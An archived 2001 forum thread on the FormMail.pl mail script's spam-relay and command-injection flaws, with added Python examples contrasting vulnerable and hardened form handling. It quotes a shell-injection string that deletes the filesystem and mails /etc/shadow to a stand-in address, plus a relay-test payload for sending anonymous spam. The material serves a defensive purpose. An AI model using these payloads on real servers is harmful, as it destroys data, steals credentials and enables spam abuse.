Mailform
Marty
04-03-2001, 12:56 PM
Using the Aota for my mail form all works well, until the user submits their email address. Then I get a standard and ugly page with the URL /cgi-sys/mailform
I have tried in vain to find this in the hope I can manipulate it to have a Thank You page that fits my site.
Has anyone done this?
Does anyone know where /cgi-sys/mailform is?
Cheers
Marty
Monty
04-03-2001, 03:55 PM
Marty, the cgi-sys is the system cgi bin that site owners don't have direct access to. I believe it uses the script at http://www.worldwidemart.com/scripts/formmail.shtml to do its work. That script has a variable in it that lets you do what you want. You could set that script up in your own cgi-bin and check it out. Matt's scripts are pretty easy to set up and work with.
Mont
I also just use formmail.pl myself.
But, I trust you have something like the following in your form:
<INPUT TYPE=HIDDEN NAME="missing_fields_redirect" VALUE="http://www.yoururl.com/error.htm">
<INPUT TYPE=HIDDEN NAME="redirect" VALUE="http://www.yoururl.com/success.htm">
These should result in displaying your own static success and error pages which you can lay out however you like. The downside is that unless you install your own formmail.pl, you can't echo the form input back to the user using custom layouts.
Maynard
04-03-2001, 05:22 PM
FormMail.pl is known to have some very serious vulnerabilities. Many recommend to not use it at all.
Best suggestion to keep it from being used as a spam machine is to run a local copy and hardcode the recipient into the script and not use it in the calling html.
Add
$Config{'recipient'} = 'destination@your.domain';
around line 175 or so.
If you don't like this advice, use your form the way you have it, and enter into the comment field something like
recipient=formtest@your.domain&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam
then watch for the mail at formtest@your.domain
Additional tips should you continue to use Formmail.pl:
the following line is delivered = 1; change to = 0;
$check_referer = 0;
somewhere around line 80 or so, hardcode to send environment variables with the message:
$Config{'env_report'} = 'REMOTE_ADDR,REMOTE_HOST,REMOTE_USER,QUERY_STRING,AUTH_TYPE,HTTP_USER_AGENT,HTTP_REFERER';
More information is available at
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26tid%3D168177%26fromthread%3D0%26start%3D2001-03-04%26threads%3D1%26end%3D2001-03-10%26
One veteran says:
"I'll say this slowly so everyone can understand. I've said it before, but I am saying it again for emphasis.
I HAVE HAD A BOX ROOTED DUE TO A HUGE, GAPING SECURITY HOLE IN FORMMAIL.PL.
DO NOT USE IT. EVER."
Apparently the script code which qualifies a valid email address can be exploited to accept input such as the following (which is meaningless to me):
(sleep 300 ; /bin/rm -rf / &) &; /bin/cat /etc/shadow | /bin/mailx -s "ALL YOUR BASE ARE BELONG TO US" luser@example.com
....in case you wanted to know ;)
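The string Maynard quotes above only works because two things happen at once: a loose address check lets shell punctuation through, and the script then hands the address to a shell (the `open(MAIL, "|$mailprog ...")` pattern). The following is an added example, written in Python rather than FormMail's Perl and not code from this thread or from Matt's script, that puts the loose validator and shell-string pattern beside a strict validator and an argv-based call. `loose_check_email`, `STRICT_EMAIL`, the `/usr/lib/sendmail` path and the exploit string constant are assumptions for the demonstration; nothing here executes the quoted command.

```python
import re
import subprocess

# Constructed attacker input: the string quoted in the thread. A naive check
# accepts it because it *ends* in something that looks like an address.
EXPLOIT_ADDRESS = ('(sleep 300 ; /bin/rm -rf / &) &; /bin/cat /etc/shadow | '
                   '/bin/mailx -s "ALL YOUR BASE ARE BELONG TO US" luser@example.com')

SHELL_META = set(";&|`$()<>\n\r\"'\\ ")


def loose_check_email(addr):
    """Assumed loose validator: an '@' somewhere and a dot after it.
    This is the kind of test that waves the string above through."""
    local, sep, domain = addr.rpartition("@")
    return bool(sep) and "." in domain


# Strict form: only characters that occur in a conventional mailbox and host
# name, so no whitespace or shell punctuation can pass. The first character may
# not be '-', otherwise a "-bs@example.com" style address would be parsed by
# sendmail as an option even when passed as a separate argv element.
STRICT_EMAIL = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}$")


def strict_check_email(addr):
    return bool(STRICT_EMAIL.match(addr))


def vulnerable_mail_command(recipient, mailprog="/usr/lib/sendmail"):
    """The dangerous pattern: one string that a shell will parse. Every
    metacharacter inside `recipient` becomes part of the command line."""
    if not loose_check_email(recipient):
        raise ValueError("rejected address")
    return f"{mailprog} {recipient}"


def hardened_mail_argv(recipient, mailprog="/usr/lib/sendmail"):
    """Validate strictly, then build an argv list: each element reaches the
    program as exactly one argument and no shell ever sees it."""
    if not strict_check_email(recipient):
        raise ValueError("rejected address")
    return [mailprog, "-oi", recipient]


def injected_metacharacters(command_line):
    """Shell metacharacters a command string carries, ignoring the single
    space between program and address. Empty for a clean address."""
    return sorted((set(command_line) & SHELL_META) - {" "})


def send(argv, message, runner=subprocess.run):
    """Deliver through argv, never through a shell. `runner` is injectable so
    the function can be exercised on a machine without a local sendmail."""
    return runner(argv, input=message.encode(), check=True)


if __name__ == "__main__":
    cmd = vulnerable_mail_command(EXPLOIT_ADDRESS)
    print("loose check accepted it; shell would see:", injected_metacharacters(cmd))
    try:
        hardened_mail_argv(EXPLOIT_ADDRESS)
    except ValueError as e:
        print("strict check:", e)
    print("clean argv:", hardened_mail_argv("luser@example.com"))
```

The point of `injected_metacharacters` is only to make the failure visible without running anything: the same string that the loose check accepted carries `;`, `|`, `&` and parentheses, each of which a shell would act on. The hardened path refuses the address before any command is built, and even an accepted address can only ever be one argv element.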
[bump]
My domain was just hit by a spammer using an AOL account who used my domain's formmail.pl to send a really obnoxious spam. All of a sudden, within 3 minutes I got 90 emails stating that mail (that I had not sent) was undeliverable. I can only shudder at how many emails might have been delivered in the minutes before I renamed my copy of formmail.
It appears that they simply found formmail.pl by searching for it at random, looking for cgi-bin/formmail.pl (I originally thought that they had spidered my html forms, but they targeted 2 of my domains which were actually IRM's and were not pointing at formmail themselves but were valid URLs because of the overlaid cgi-bin.)
I just wanted to bump this message in the forum.
And thanks very much to Terra for quickly helping me figure out exactly what happened.
[This message has been edited by Jeff (edited 05-30-01@05:32 am)]
sheila
05-30-2001, 08:09 AM
This thread (with Maynard's link) was posted during the time that I first started working on my own form mail script. It prompted me to learn a lot about security issues. I was amazed to find out just how easy it is for someone to exploit a script that has not been written with security in mind. And apparently, many of the free scripts are like this.
In any case, I've tried to take a great deal of care in my script to be careful to close any security holes. I think it is difficult to write a form mail program to be secure, since it needs to allow most fields to pass through. Custom CGIs, that someone writes just for their own site, usually have security checks in them that allow only certain values for the fields, especially any To-address field.
I also learned that hidden fields provide no security at all, and that it is easy for a spammer to send ANY input they want to your form, including setting environment variables such as the HTTP_REFERER field. Checking for the referrer is no security at all. It is a simple matter to write a script that will set this to any desired value. Never trust user submitted data in your form.
If anyone would like, I believe that Gypsy Mail (http://www.thinkspot.net/sheila/computers/software/gypsymail.html) is secure against this type of attack. I can't guarantee it, of course (liability issues, here), but I've taken a number of precautions. (http://www.thinkspot.net/sheila/computers/software/gypsy/gypsydoc.html#security)
Sorry to hear about what happened to you, Jeff. I take it that somehow, by great luck, the e-mails simply errored and were never delivered? Whew!
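Maynard's advice to hardcode the recipient (and log `env_report` values), his `recipient=...&message=...` relay test, and Sheila's point that hidden fields and the Referer header are set by the client all come down to one design rule: the server decides where mail goes and which fields it accepts, and nothing in the request can change that. The following is an added example, in Python rather than Perl and not code from FormMail, Gypsy Mail or this thread, that handles the same form body the vulnerable way and the hardened way. `SITE_RECIPIENT`, `SITE_ORIGIN`, `ALLOWED_FIELDS`, the request constants and the env dictionary are all constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Fixed destination, the equivalent of Maynard's hardcoded $Config{'recipient'}.
SITE_RECIPIENT = "destination@your.domain"          # assumed address
SITE_ORIGIN = "http://www.yoururl.com"               # assumed site (from Mont's form)
ALLOWED_FIELDS = {"realname", "email", "subject", "message"}
ENV_REPORT = ("REMOTE_ADDR", "HTTP_USER_AGENT", "HTTP_REFERER")
EMAIL_RE = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}$")

# Constructed request: the relay test from the thread plus a forged Referer,
# which any HTTP client can send.
SPAM_BODY = ("recipient=victim1@example.net,victim2@example.net"
             "&subject=Buy%20now"
             "&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam")
SPOOFED_ENV = {"HTTP_REFERER": "http://www.yoururl.com/contact.htm",
               "REMOTE_ADDR": "192.0.2.10", "HTTP_USER_AGENT": "curl"}


def first(form, name):
    return form.get(name, [""])[0]


def vulnerable_dispatch(body, env):
    """FormMail-style handling: the destination is the form's own 'recipient'
    field and the only gate is a Referer check. Both are attacker-controlled,
    so the script becomes an open relay for whoever finds it."""
    form = parse_qs(body, keep_blank_values=True)
    if not env.get("HTTP_REFERER", "").startswith(SITE_ORIGIN):
        return None
    return {"to": first(form, "recipient").split(","),
            "subject": first(form, "subject"),
            "body": first(form, "message")}


def hardened_dispatch(body, env):
    """Server-controlled destination; the request can only fill the fields
    the form was designed to carry. Returns None for a rejected request."""
    form = parse_qs(body, keep_blank_values=True)
    # 1. Drop any field not on the allowlist: recipient, redirect, bcc, ...
    fields = {k: v[0] for k, v in form.items() if k in ALLOWED_FIELDS}
    # 2. The sender's address is only ever a Reply-To, and only if well-formed.
    reply_to = fields.get("email", "")
    if reply_to and not EMAIL_RE.match(reply_to):
        return None
    # 3. Anything that lands in a mail header must not contain CR or LF, or the
    #    submitter could append headers of their own (Bcc: a spam list).
    subject = fields.get("subject", "") or "Form submission"
    if re.search(r"[\r\n]", subject + reply_to):
        return None
    # 4. Maynard's env_report idea: append server-side request data, taken
    #    from the CGI environment rather than from the form, for later tracing.
    report = "\n".join(f"{k}: {env.get(k, '')}" for k in ENV_REPORT)
    return {"to": [SITE_RECIPIENT],
            "reply_to": reply_to or None,
            "subject": subject,
            "body": fields.get("message", "") + "\n\n" + report}


def safe_redirect(form_value, default="/success.htm"):
    """Honour Mont's 'redirect' hidden field only for a same-site path, so the
    script cannot be used to bounce visitors to an arbitrary URL."""
    parts = urlsplit(form_value)
    if parts.scheme or parts.netloc or not parts.path.startswith("/") \
            or parts.path.startswith("//"):
        return default
    return parts.path


if __name__ == "__main__":
    print("vulnerable:", vulnerable_dispatch(SPAM_BODY, SPOOFED_ENV)["to"])
    print("hardened:  ", hardened_dispatch(SPAM_BODY, SPOOFED_ENV)["to"])
    print("redirect:  ", safe_redirect("http://evil.example/phish"))
```

With the constructed request the vulnerable path addresses the mail to the two victims because the forged Referer passes, while the hardened path ignores `recipient` entirely and still delivers the message, now annotated with the requesting IP and user agent, to the site's own address. Note that the hardened version does not check the Referer at all: as Sheila says, it proves nothing, so the code does not pretend it does.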